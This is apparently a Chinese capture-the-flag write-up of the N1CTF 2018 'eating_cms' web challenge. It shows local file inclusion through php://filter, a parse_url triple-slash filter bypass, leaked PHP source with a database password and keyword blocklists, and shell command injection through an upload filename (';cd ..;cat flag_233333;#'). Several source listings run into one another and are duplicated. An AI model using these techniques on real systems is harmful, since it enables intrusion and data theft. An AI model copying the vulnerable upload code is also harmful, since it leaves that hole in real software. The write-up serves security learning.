[N1CTF 2018]eating_cms_

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS PostgreSQL,高可用系列 2核4GB
云数据库 RDS MySQL,高可用系列 2核4GB
简介: [N1CTF 2018]eating_cms_

信息收集

进入即是登录页面,抓包一看应该是SQL注入,但是空格、%、|等等啥的都被waf了,不太好注入,先信息收集一波

花一分钟扫下目录,发现一个viminfo和register.php

Viminfo文件是Vim用来记录退出时的状态

1. 200  /index.php
2. 200  /login.php
3. 200  /register.php
4. 200  /.viminfo
5. 403  /.htaccess
6. 
7. vim updateadmin.php
8. vim info.php
9. vim login.php

发现一个info.php和updateadmin.php,访问的回显都是you can not visit it directly,我们先注册账号

注册admin时显示    Username has been registered!    

查看URL似乎是文件包含?用伪协议读取下user源码看看

/user.php?page=php://filter/convert.base64-encode/resource=user

代码审计

1. <?php
2. require_once("function.php");
3. if( !isset( $_SESSION['user'] )){
4. Header("Location: index.php");
5. 
6. }
7. if($_SESSION['isadmin'] === '1'){
8. $oper_you_can_do = $OPERATE_admin;
9. }else{
10. $oper_you_can_do = $OPERATE;
11. }
12. //die($_SESSION['isadmin']);
13. if($_SESSION['isadmin'] === '1'){
14. if(!isset($_GET['page']) || $_GET['page'] === ''){
15. $page = 'info';
16.     }else {
17. $page = $_GET['page'];
18.     }
19. }
20. else{
21. if(!isset($_GET['page'])|| $_GET['page'] === ''){
22. $page = 'guest';
23.     }else {
24. $page = $_GET['page'];
25. if($page === 'info')
26.         {
27. //            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
28. Header("Location: user.php?page=guest");
29.         }
30.     }
31. }
32. filter_directory();
33. //if(!in_array($page,$oper_you_can_do)){
34. //    $page = 'info';
35. //}
36. include "$page.php";
37. ?>

/user.php?page=php://filter/convert.base64-encode/resource=function

1. <?php
2. require_once("function.php");
3. if( !isset( $_SESSION['user'] )){
4. Header("Location: index.php");
5. 
6. }
7. if($_SESSION['isadmin'] === '1'){
8. $oper_you_can_do = $OPERATE_admin;
9. }else{
10. $oper_you_can_do = $OPERATE;
11. }
12. //die($_SESSION['isadmin']);
13. if($_SESSION['isadmin'] === '1'){
14. if(!isset($_GET['page']) || $_GET['page'] === ''){
15. $page = 'info';
16.     }else {
17. $page = $_GET['page'];
18.     }
19. }
20. else{
21. if(!isset($_GET['page'])|| $_GET['page'] === ''){
22. $page = 'guest';
23.     }else {
24. $page = $_GET['page'];
25. if($page === 'info')
26.         {
27. //            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script><?php
28. session_start();
29. require_once "config.php";
30. function Hacker()
31. {
32. Header("Location: hacker.php");
33. die();
34. }
35. 
36. 
37. function filter_directory()
38. {
39. $keywords = ["flag","manage","ffffllllaaaaggg"];
40. $uri = parse_url($_SERVER["REQUEST_URI"]);
41. parse_str($uri['query'], $query);
42. //    var_dump($query);
43. //    die();
44. foreach($keywords as $token)
45.     {
46. foreach($query as $k => $v)
47.         {
48. if (stristr($k, $token))
49. hacker();
50. if (stristr($v, $token))
51. hacker();
52.         }
53.     }
54. }
55. 
56. function filter_directory_guest()
57. {
58. $keywords = ["flag","manage","ffffllllaaaaggg","info"];
59. $uri = parse_url($_SERVER["REQUEST_URI"]);
60. parse_str($uri['query'], $query);
61. //    var_dump($query);
62. //    die();
63. foreach($keywords as $token)
64.     {
65. foreach($query as $k => $v)
66.         {
67. if (stristr($k, $token))
68. hacker();
69. if (stristr($v, $token))
70. hacker();
71.         }
72.     }
73. }
74. 
75. function Filter($string)
76. {
77. global $mysqli;
78. $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
79. $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
80. for ($i = 0; $i < strlen($string); $i++) {
81. if (strpos("$whitelist", $string[$i]) === false) {
82. Hacker();
83.         }
84.     }
85. if (preg_match("/$blacklist/is", $string)) {
86. Hacker();
87.     }
88. if (is_string($string)) {
89. return $mysqli->real_escape_string($string);
90.     } else {
91. return "";
92.     }
93. }
94. 
95. function sql_query($sql_query)
96. {
97. global $mysqli;
98. $res = $mysqli->query($sql_query);
99. return $res;
100. }
101. 
102. function login($user, $pass)
103. {
104. $user = Filter($user);
105. $pass = md5($pass);
106. $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
107. echo $sql;
108. $res = sql_query($sql);
109. //    var_dump($res);
110. //    die();
111. if ($res->num_rows) {
112. $data = $res->fetch_array();
113. $_SESSION['user'] = $data[username_which_you_do_not_know];
114. $_SESSION['login'] = 1;
115. $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
116. return true;
117.     } else {
118. return false;
119.     }
120. return;
121. }
122. 
123. function updateadmin($level,$user)
124. {
125. $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
126. echo $sql;
127. $res = sql_query($sql);
128. //    var_dump($res);
129. //    die();
130. //    die($res);
131. if ($res == 1) {
132. return true;
133.     } else {
134. return false;
135.     }
136. return;
137. }
138. 
139. function register($user, $pass)
140. {
141. global $mysqli;
142. $user = Filter($user);
143. $pass = md5($pass);
144. $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
145. $res = sql_query($sql);
146. return $mysqli->insert_id;
147. }
148. 
149. function logout()
150. {
151. session_destroy();
152. Header("Location: index.php");
153. }
154. 
155. ?>

/user.php?page=php://filter/convert.base64-encode/resource=config

1. <?php
2. require_once("function.php");
3. if( !isset( $_SESSION['user'] )){
4. Header("Location: index.php");
5. 
6. }
7. if($_SESSION['isadmin'] === '1'){
8. $oper_you_can_do = $OPERATE_admin;
9. }else{
10. $oper_you_can_do = $OPERATE;
11. }
12. //die($_SESSION['isadmin']);
13. if($_SESSION['isadmin'] === '1'){
14. if(!isset($_GET['page']) || $_GET['page'] === ''){
15. $page = 'info';
16.     }else {
17. $page = $_GET['page'];
18.     }
19. }
20. else{
21. if(!isset($_GET['page'])|| $_GET['page'] === ''){
22. $page = 'guest';
23.     }else {
24. $page = $_GET['page'];
25. if($page === 'info')
26.         {
27. //            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script><?php
28. session_start();
29. require_once "config.php";
30. function Hacker()
31. {
32. Header("Location: hacker.php");
33. die();
34. }
35. 
36. 
37. function filter_directory()
38. {
39. $keywords = ["flag","manage","ffffllllaaaaggg"];
40. $uri = parse_url($_SERVER["REQUEST_URI"]);
41. parse_str($uri['query'], $query);
42. //    var_dump($query);
43. //    die();
44. foreach($keywords as $token)
45.     {
46. foreach($query as $k => $v)
47.         {
48. if (stristr($k, $token))
49. hacker();
50. if (stristr($v, $token))
51. hacker();
52.         }
53.     }
54. }
55. 
56. function filter_directory_guest()
57. {
58. $keywords = ["flag","manage","ffffllllaaaaggg","info"];
59. $uri = parse_url($_SERVER["REQUEST_URI"]);
60. parse_str($uri['query'], $query);
61. //    var_dump($query);
62. //    die();
63. foreach($keywords as $token)
64.     {
65. foreach($query as $k => $v)
66.         {
67. if (stristr($k, $token))
68. hacker();
69. if (stristr($v, $token))
70. hacker();
71.         }
72.     }
73. }
74. 
75. function Filter($string)
76. {
77. global $mysqli;
78. $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
79. $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
80. for ($i = 0; $i < strlen($string); $i++) {
81. if (strpos("$whitelist", $string[$i]) === false) {
82. Hacker();
83.         }
84.     }
85. if (preg_match("/$blacklist/is", $string)) {
86. Hacker();
87.     }
88. if (is_string($string)) {
89. return $mysqli->real_escape_string($string);
90.     } else {
91. return "";
92.     }
93. }
94. 
95. function sql_query($sql_query)
96. {
97. global $mysqli;
98. $res = $mysqli->query($sql_query);
99. return $res;
100. }
101. 
102. function login($user, $pass)
103. {
104. $user = Filter($user);
105. $pass = md5($pass);
106. $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
107. echo $sql;
108. $res = sql_query($sql);
109. //    var_dump($res);
110. //    die();
111. if ($res->num_rows) {
112. $data = $res->fetch_array();
113. $_SESSION['user'] = $data[username_which_you_do_not_know];
114. $_SESSION['login'] = 1;
115. $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
116. return true;
117.     } else {
118. return false;
119.     }
120. return;
121. }
122. 
123. function updateadmin($level,$user)
124. {
125. $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
126. echo $sql;
127. $res = sql_query($sql);
128. //    var_dump($res);
129. //    die();
130. //    die($res);
131. if ($res == 1) {
132. return true;
133.     } else {
134. return false;
135.     }
136. return;
137. }
138. 
139. function register($user, $pass)
140. {
141. global $mysqli;
142. $user = Filter($user);
143. $pass = md5($pass);
144. $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
145. $res = sql_query($sql);
146. return $mysqli->insert_id;
147. }
148. 
149. function logout()
150. {
151. session_destroy();
152. Header("Location: index.php");
153. }
154. 
155. ?>
156. <?php
157. error_reporting(E_ERROR | E_WARNING | E_PARSE);
158. define(BASEDIR, "/var/www/html/");
159. define(FLAG_SIG, 1);
160. $OPERATE = array('userinfo','upload','search');
161. $OPERATE_admin = array('userinfo','upload','search','manage');
162. $DBHOST = "localhost";
163. $DBUSER = "root";
164. $DBPASS = "Nu1LCTF2018!@#qwe";
165. //$DBPASS = "";
166. $DBNAME = "N1CTF";
167. $mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
168. if(mysqli_connect_errno()){
169. echo "no sql connection".mysqli_connect_error();
170. $mysqli=null;
171. die();
172. }
173. ?>

$keywords = ["flag","manage","ffffllllaaaaggg"]这三个页面可能有重要信息

parse_url解析漏洞

1. $keywords = ["flag","manage","ffffllllaaaaggg"];
2. $uri = parse_url($_SERVER["REQUEST_URI"]);
3. parse_str($uri['query'], $query);

这里看下处理的逻辑

1. <?php
2. $a="http://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?page=guest";
3. $uri = parse_url($a);
4. print_r($uri);
5. //parse_str($uri[''], $query);
6. ?>

Array

(

   [scheme] => http

   [host] => 78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn

   [port] => 81

   [path] => /user.php

   [query] => page=guest

)

1. <?php
2. $a="http://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?page=guest";
3. $uri = parse_url($a);
4. //print_r($uri);
5. parse_str($uri['query'],$query);
6. print_r($query);
7. //parse_str($uri[''], $query);
8. ?>

Array

(

   [page] => guest

)

我们这里查到PHP版本是5.5.9

这里利用parse_url解析漏洞

///user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
1. <?php
2. if (FLAG_SIG != 1){
3. die("you can not visit it directly");
4. }else {
5. echo "you can find sth in m4aaannngggeee";
6. }
7. ?>
///user.php?page=php://filter/convert.base64-encode/resource=m4aaannngggeee
1. <?php
2. if (FLAG_SIG != 1){
3. die("you can not visit it directly");
4. }
5. include "templates/upload.html";
6. ?>

尝试上传文件,上传失败。发现/templates/upllloadddd.php

读upllloadddd的源码

1. <?php
2. $allowtype = array("gif","png","jpg");
3. $size = 10000000;
4. $path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
5. $filename = $_FILES['file']['name'];
6. if(is_uploaded_file($_FILES['file']['tmp_name'])){
7. if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
8. die("error:can not move");
9.     }
10. }else{
11. die("error:not an upload fileï¼");
12. }
13. $newfile = $path.$filename;
14. echo "file upload success<br />";
15. echo $filename;
16. $picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
17. echo "<img src='data:image/png;base64,".$picdata."'></img>";
18. if($_FILES['file']['error']>0){
19. unlink($newfile);
20. die("Upload file error: ");
21. }
22. $ext = array_pop(explode(".",$_FILES['file']['name']));
23. if(!in_array($ext,$allowtype)){
24. unlink($newfile);
25. }
26. ?>

$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");

现在需要找到上传点,莫非是之前的user.php?page=updateadmin吗?发现也没有上传处,最后看wp发现上传点在/user.php?page=m4aaannngggeee,看两者的页面貌似是继承来的?

貌似不能加/

filename=;cd ..;ls ;#

;cd ..;cat flag_233333;#

相关实践学习
每个IT人都想学的“Web应用上云经典架构”实战
本实验从Web应用上云这个最基本的、最普遍的需求出发,帮助IT从业者们通过“阿里云Web应用上云解决方案”,了解一个企业级Web应用上云的常见架构,了解如何构建一个高可用、可扩展的企业级应用架构。
MySQL数据库入门学习
本课程通过最流行的开源数据库MySQL带你了解数据库的世界。 &nbsp; 相关的阿里云产品:云数据库RDS MySQL 版 阿里云关系型数据库RDS(Relational Database Service)是一种稳定可靠、可弹性伸缩的在线数据库服务,提供容灾、备份、恢复、迁移等方面的全套解决方案,彻底解决数据库运维的烦恼。 了解产品详情:&nbsp;https://www.aliyun.com/product/rds/mysql&nbsp;
目录
相关文章
|
前端开发 Shell Linux
[网鼎杯 2020 白虎组]PicDown(精讲)
[网鼎杯 2020 白虎组]PicDown(精讲)
462 0
[网鼎杯 2020 白虎组]PicDown(精讲)
|
PHP 数据安全/隐私保护
[SUCTF 2019]EasyWeb
[SUCTF 2019]EasyWeb
303 0
|
Linux
BUU [安洵杯 2019]easy_web
BUU [安洵杯 2019]easy_web
242 0
|
Shell PHP
escapeshellarg() 函数
escapeshellarg() 函数
201 5
|
5月前
|
数据采集 存储 监控
Python 原生爬虫教程:网络爬虫的基本概念和认知
网络爬虫是一种自动抓取互联网信息的程序,广泛应用于搜索引擎、数据采集、新闻聚合和价格监控等领域。其工作流程包括 URL 调度、HTTP 请求、页面下载、解析、数据存储及新 URL 发现。Python 因其丰富的库(如 requests、BeautifulSoup、Scrapy)和简洁语法成为爬虫开发的首选语言。然而,在使用爬虫时需注意法律与道德问题,例如遵守 robots.txt 规则、控制请求频率以及合法使用数据,以确保爬虫技术健康有序发展。
759 31
|
安全 网络协议 网络安全
BUUCTF:Misc 解析(二)
BUUCTF:Misc 解析(二)
|
SQL 安全 数据库
[RCTF2015]EasySQL1 题目分析与详解
[RCTF2015]EasySQL1 题目分析与详解
|
数据库
BUU [0CTF 2016]piapiapia
BUU [0CTF 2016]piapiapia
182 0
|
11月前
|
安全 NoSQL 网络协议
SSRF内网打穿相关姿势
本文详细介绍了服务器端请求伪造(SSRF)漏洞,包括其定义、漏洞场景、常见漏洞函数、URL伪协议及其利用方法。通过具体的靶机示例,展示了如何利用SSRF漏洞进行内网探测、命令执行、SQL注入、命令注入、XXE注入、Tomcat任意文件上传和Redis未授权访问等攻击。文章还提供了相关工具和参考资料,帮助读者更好地理解和应对SSRF漏洞。
629 0
SSRF内网打穿相关姿势